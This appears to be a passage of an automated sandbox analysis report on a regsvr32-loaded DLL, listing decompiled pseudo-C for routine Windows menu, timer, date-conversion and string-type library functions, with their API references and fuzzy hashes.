                                                                                                            0x00000000
                                                                                                            0x100321db
                                                                                                            0x10032178
                                                                                                            0x1003217f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032186
                                                                                                            0x1003218a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003218d
                                                                                                            0x10032193
                                                                                                            0x10032197
                                                                                                            0x1003219a
                                                                                                            0x100321ba
                                                                                                            0x100321ba
                                                                                                            0x00000000
                                                                                                            0x100321ba
                                                                                                            0x1003219c
                                                                                                            0x100321a9
                                                                                                            0x100321ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321af
                                                                                                            0x100321b1
                                                                                                            0x100321b7
                                                                                                            0x00000000
                                                                                                            0x100321b7
                                                                                                            0x10032162
                                                                                                            0x00000000
                                                                                                            0x10032162
                                                                                                            0x10032139
                                                                                                            0x1003213a
                                                                                                            0x1003213d
                                                                                                            0x1003213e
                                                                                                            0x10032143
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032143
                                                                                                            0x10032283

                                                                                                            APIs
                                                                                                              • Part of subcall function 10029BA4: GetFocus.USER32(?,10032120,?), ref: 10029BA5
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                                                              • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                                                              • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                                                              • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                                                              • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                                                            • GetMenu.USER32(?), ref: 10032170
                                                                                                            • GetMenu.USER32(?), ref: 10032184
                                                                                                            • GetMenuItemCount.USER32 ref: 1003218D
                                                                                                            • GetSubMenu.USER32 ref: 1003219E
                                                                                                            • GetMenuItemCount.USER32 ref: 100321C0
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                                                            • GetMenuItemCount.USER32 ref: 10032240
                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4186786570-0
                                                                                                            • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                                                            • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                                                            • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}






















                                                                                                            0x1002f50b
                                                                                                            0x1002f50d
                                                                                                            0x1002f516
                                                                                                            0x1002f660
                                                                                                            0x1002f660
                                                                                                            0x1002f523
                                                                                                            0x1002f529
                                                                                                            0x1002f52c
                                                                                                            0x1002f539
                                                                                                            0x1002f54b
                                                                                                            0x1002f550
                                                                                                            0x1002f553
                                                                                                            0x1002f5b6
                                                                                                            0x1002f555
                                                                                                            0x1002f55e
                                                                                                            0x1002f567
                                                                                                            0x1002f574
                                                                                                            0x1002f574
                                                                                                            0x1002f578
                                                                                                            0x1002f57d
                                                                                                            0x1002f583
                                                                                                            0x1002f57f
                                                                                                            0x1002f57f
                                                                                                            0x1002f57f
                                                                                                            0x1002f58d
                                                                                                            0x1002f594
                                                                                                            0x1002f598
                                                                                                            0x1002f59e
                                                                                                            0x1002f59a
                                                                                                            0x1002f59a
                                                                                                            0x1002f59a
                                                                                                            0x1002f5a3
                                                                                                            0x1002f5b0
                                                                                                            0x1002f5b0
                                                                                                            0x1002f5a3
                                                                                                            0x1002f594
                                                                                                            0x1002f5c4
                                                                                                            0x1002f61a
                                                                                                            0x1002f621
                                                                                                            0x1002f62b
                                                                                                            0x1002f62b
                                                                                                            0x1002f633
                                                                                                            0x00000000
                                                                                                            0x1002f5c6
                                                                                                            0x1002f5cd
                                                                                                            0x1002f5d3
                                                                                                            0x1002f5df
                                                                                                            0x1002f5e3
                                                                                                            0x1002f609
                                                                                                            0x1002f609
                                                                                                            0x1002f60c
                                                                                                            0x1002f610
                                                                                                            0x1002f614
                                                                                                            0x1002f618
                                                                                                            0x1002f639
                                                                                                            0x1002f639
                                                                                                            0x1002f641
                                                                                                            0x1002f647
                                                                                                            0x1002f64d
                                                                                                            0x1002f656
                                                                                                            0x1002f656
                                                                                                            0x1002f64d
                                                                                                            0x00000000
                                                                                                            0x1002f65d
                                                                                                            0x00000000
                                                                                                            0x1002f618
                                                                                                            0x1002f5e5
                                                                                                            0x1002f5ea
                                                                                                            0x00000000
                                                                                                            0x1002f5f8
                                                                                                            0x1002f5fb
                                                                                                            0x1002f600
                                                                                                            0x1002f602
                                                                                                            0x1002f602
                                                                                                            0x1002f607
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002f607
                                                                                                            0x1002f5ea

                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002F50D
                                                                                                            • GetCursorPos.USER32(?), ref: 1002F52C
                                                                                                            • ScreenToClient.USER32 ref: 1002F539
                                                                                                            • GetCapture.USER32 ref: 1002F586
                                                                                                              • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                                                            • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                                                            • IsChild.USER32(?,00000000), ref: 1002F5EE
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                                                            • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                                                              • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                                                              • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                            • String ID:
                                                                                                            • API String ID: 1383385731-0
                                                                                                            • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                                                            • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                                                            • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                                                            0x1001328a
                                                                                                            0x10013293
                                                                                                            0x10013295
                                                                                                            0x10013298
                                                                                                            0x10013299
                                                                                                            0x1001329b
                                                                                                            0x1001329e
                                                                                                            0x100132a1
                                                                                                            0x100134d0
                                                                                                            0x100134d0
                                                                                                            0x100134d0
                                                                                                            0x00000000
                                                                                                            0x100132b2
                                                                                                            0x100132b2
                                                                                                            0x100132b6
                                                                                                            0x00000000
                                                                                                            0x100132cc
                                                                                                            0x100132cc
                                                                                                            0x100132d1
                                                                                                            0x100132d8
                                                                                                            0x100132db
                                                                                                            0x100132dc
                                                                                                            0x100132de
                                                                                                            0x100132e0
                                                                                                            0x100132e1
                                                                                                            0x100132e4
                                                                                                            0x100132e7
                                                                                                            0x100132ec
                                                                                                            0x100132f1
                                                                                                            0x100132f5
                                                                                                            0x100132f8
                                                                                                            0x100132f8
                                                                                                            0x100132fc
                                                                                                            0x10013300
                                                                                                            0x00000000
                                                                                                            0x10013312
                                                                                                            0x10013312
                                                                                                            0x10013316
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013316
                                                                                                            0x10013327
                                                                                                            0x10013327
                                                                                                            0x10013327
                                                                                                            0x10013338
                                                                                                            0x1001333c
                                                                                                            0x1001333f
                                                                                                            0x1001334e
                                                                                                            0x10013371
                                                                                                            0x1001337d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001337f
                                                                                                            0x1001337f
                                                                                                            0x10013382
                                                                                                            0x10013384
                                                                                                            0x10013388
                                                                                                            0x10013388
                                                                                                            0x1001338c
                                                                                                            0x10013392
                                                                                                            0x10013397
                                                                                                            0x10013398
                                                                                                            0x1001339b
                                                                                                            0x1001339d
                                                                                                            0x100133aa
                                                                                                            0x100133ae
                                                                                                            0x100133b1
                                                                                                            0x100133bf
                                                                                                            0x100133c7
                                                                                                            0x100133ca
                                                                                                            0x100133cd
                                                                                                            0x100133de
                                                                                                            0x100133e4
                                                                                                            0x100133fb
                                                                                                            0x10013400
                                                                                                            0x1001340a
                                                                                                            0x10013411
                                                                                                            0x1001341a
                                                                                                            0x1001341d
                                                                                                            0x1001341f
                                                                                                            0x10013428
                                                                                                            0x10013434
                                                                                                            0x1001343a
                                                                                                            0x1001343e
                                                                                                            0x1001344a
                                                                                                            0x1001344d
                                                                                                            0x10013454
                                                                                                            0x10013459
                                                                                                            0x1001345d
                                                                                                            0x1001345f
                                                                                                            0x10013462
                                                                                                            0x10013464
                                                                                                            0x10013467
                                                                                                            0x1001346a
                                                                                                            0x1001346d
                                                                                                            0x100134b7
                                                                                                            0x100134bc
                                                                                                            0x100134bf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100134c1
                                                                                                            0x100134cb
                                                                                                            0x00000000
                                                                                                            0x100134cc
                                                                                                            0x1001346f
                                                                                                            0x10013474
                                                                                                            0x10013479
                                                                                                            0x1001347a
                                                                                                            0x10013481
                                                                                                            0x10013484
                                                                                                            0x1001348c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001348e
                                                                                                            0x10013491
                                                                                                            0x10013493
                                                                                                            0x1001349c
                                                                                                            0x100134a1
                                                                                                            0x100134a2
                                                                                                            0x100134a9
                                                                                                            0x100134ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013493
                                                                                                            0x1001334e
                                                                                                            0x100132d1
                                                                                                            0x100132b6

                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 10013342
                                                                                                            • __allrem.LIBCMT ref: 1001335A
                                                                                                            • __allrem.LIBCMT ref: 10013376
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                                                              • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                                                            • String ID: E
                                                                                                            • API String ID: 4106114094-3568589458
                                                                                                            • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                                                            • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                                                            • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001843D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                                                            0x1001843d
                                                                                                            0x1001843d
                                                                                                            0x1001843f
                                                                                                            0x10018444
                                                                                                            0x10018449
                                                                                                            0x1001844b
                                                                                                            0x10018451
                                                                                                            0x10018469
                                                                                                            0x10018473
                                                                                                            0x10018479
                                                                                                            0x1001847c
                                                                                                            0x1001847e
                                                                                                            0x1001847e
                                                                                                            0x1001846b
                                                                                                            0x1001846b
                                                                                                            0x1001846b
                                                                                                            0x10018469
                                                                                                            0x10018488
                                                                                                            0x10018490
                                                                                                            0x10018580
                                                                                                            0x10018583
                                                                                                            0x10018585
                                                                                                            0x10018587
                                                                                                            0x10018587
                                                                                                            0x1001858d
                                                                                                            0x10018590
                                                                                                            0x10018592
                                                                                                            0x10018594
                                                                                                            0x10018594
                                                                                                            0x1001859b
                                                                                                            0x100185a1
                                                                                                            0x100185a4
                                                                                                            0x100185aa
                                                                                                            0x100185ac
                                                                                                            0x100185cc
                                                                                                            0x100185df
                                                                                                            0x100185e1
                                                                                                            0x100185e3
                                                                                                            0x100185e5
                                                                                                            0x100185e6
                                                                                                            0x100185eb
                                                                                                            0x100185ec
                                                                                                            0x00000000
                                                                                                            0x100185ec
                                                                                                            0x100185ae
                                                                                                            0x100185b0
                                                                                                            0x100185b5
                                                                                                            0x100185b6
                                                                                                            0x100185b9
                                                                                                            0x100185ba
                                                                                                            0x100185c3
                                                                                                            0x100185c5
                                                                                                            0x100185c7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100185c9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001849e
                                                                                                            0x100184a1
                                                                                                            0x100185a6
                                                                                                            0x100185a6
                                                                                                            0x100185ee
                                                                                                            0x100185f6
                                                                                                            0x100185f6
                                                                                                            0x100184a7
                                                                                                            0x100184aa
                                                                                                            0x100184b0
                                                                                                            0x100184b2
                                                                                                            0x100184b7
                                                                                                            0x100184b7
                                                                                                            0x100184db
                                                                                                            0x100184dd
                                                                                                            0x100184e2
                                                                                                            0x00000000
                                                                                                            0x100184e8
                                                                                                            0x100184e8
                                                                                                            0x100184ec
                                                                                                            0x100184f7
                                                                                                            0x100184fc
                                                                                                            0x100184ff
                                                                                                            0x10018501
                                                                                                            0x10018508
                                                                                                            0x10018510
                                                                                                            0x1001852b
                                                                                                            0x1001852d
                                                                                                            0x10018546
                                                                                                            0x10018553
                                                                                                            0x1001855b
                                                                                                            0x1001856b
                                                                                                            0x1001856b
                                                                                                            0x1001856e
                                                                                                            0x10018572
                                                                                                            0x10018574
                                                                                                            0x10018575
                                                                                                            0x1001857a
                                                                                                            0x1001857b
                                                                                                            0x00000000
                                                                                                            0x1001852f
                                                                                                            0x1001852f
                                                                                                            0x10018530
                                                                                                            0x10018539
                                                                                                            0x1001853d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001853f
                                                                                                            0x00000000
                                                                                                            0x1001853f
                                                                                                            0x1001852d
                                                                                                            0x100184e2

                                                                                                            APIs
                                                                                                            • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                                                            • GetLastError.KERNEL32 ref: 10018473
